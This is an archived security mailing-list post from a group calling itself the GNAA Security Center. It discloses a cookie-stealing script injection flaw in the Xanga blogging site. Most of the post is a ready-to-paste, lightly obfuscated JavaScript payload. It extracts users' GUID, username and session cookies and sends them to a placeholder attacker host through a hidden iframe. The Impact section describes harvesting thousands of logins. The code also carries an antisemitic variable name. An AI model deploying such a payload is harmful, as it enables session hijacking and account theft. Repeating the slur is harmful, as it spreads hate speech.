lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <affebc6f05010111405ff5108d@mail.gmail.com> From: gerryniger at gmail.com (gnaa/rkz) Subject: Xanga Login Cookie stealing Vunerability - GNAA Security Center Vendor: Xanga URL: http://www.xanga.com/ Versions: Current Remote: Yes vendor notified: 06 Oct 2004 at 14:08 Vendor response: NONE Summary: ~~~~~~~ Xanga is a fully featured blogging system, it provides great control over look & feel of a users blog by allowing HTML with only basic checks. Xanga has well over 100,000 users and millions of page views every hour. A security vulnerability in the current system allows malicious users to steal session cookies =================================== Examples Code: ~~~~~~~~~~~~~~~~~~~~~~~~ Pre-reqs: * Create an Account, this does not require a valid email. 1. Click Look & Feel on the lefthand navigation bar 2. In the "Insert your own HTML" Box enter for following code. ~~~~~~~~~~~~CUT AFTER HERE~~~~~~~~~~~~~~~~~ <script> var gt = "<"; var e1 = "scr"; var e2 = "ipt"; var lt = ">"; var if1 = "ifr"; var if2 = "ame"; document.write(gt + e1 + e2 + lt); document.write("var jewsdidwtc = documen"); document.write("t.cook"); document.write("ie.split(\';\');"); document.write("<\/script>"); // WRITE COOKIE TO TOP OF SCREEN. document.write(jewsdidwtc); var quot = '"' // THE FOLLOWING CODE DEMONSTRATES HOW // TO STEAL THE COOKIE, "SOMESITE" SHOULD // BE A SITE WHERE YOU CAN TAIL THE LOGS // OR MAYBE WRITE A SPECIFIC SCRIPT TO // CAPTURE THE ARGUMENTS PROVIDED var url = "http://SOMEWEBSITE/"; document.write(gt + if1 + if2); document.write(" src=" + url + "?guid="); // --- get guid --- var GUID = "GUID="; for(var i=0;i < jewsdidwtc.length;i++) { var c = jewsdidwtc[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(GUID) == 0) var GUIDval = c.substring(GUID.length,c.length); } // --- get username --- var USER = "u="; for(var i=0;i < jewsdidwtc.length;i++) { var c = jewsdidwtc[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(USER) == 0) var USERval = c.substring(USER.length,c.length); } // --- get sessionid --- var SESS = "x="; for(var i=0;i < jewsdidwtc.length;i++) { var c = jewsdidwtc[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(SESS) == 0) var SESSval = c.substring(SESS.length,c.length); } document.write(GUIDval); document.write("&u=" + USERval); document.write("&x=" + SESSval); document.write(quot); document.write(" WIDTH=1 HEIGHT=1" + lt); </script> ~~~~~~~~~~~~END CUT HERE~~~~~~~~~~~~~~~~~ ========================================= Impact: ~~~~~ This code just shows how to steal session cookies, it would seem that getting hits to a malicious users blog could be quite hard. This is not the case. When combined with existing Xanga exploits: 1. http://homepage.ntlworld.com/allencastro/autoreg.gnaa 2. http://homepage.ntlworld.com/allencastro/xanga.gnaa could potentially generate thousands of hits and even become featured on Xanga's front page (due to popularity of page). Meaning the attacker could get thousands of logins in a few hours. Vendor: ~~~~~ Vendor was informed months ago but we have recieved no reply. Credits: ~~~~~ K5 Article on Xanga: http://www.kuro5hin.org/story/2004/12/28/161214/43 The GNAA Security Team: http://www.gnaa.us/
Powered by blists - more mailing lists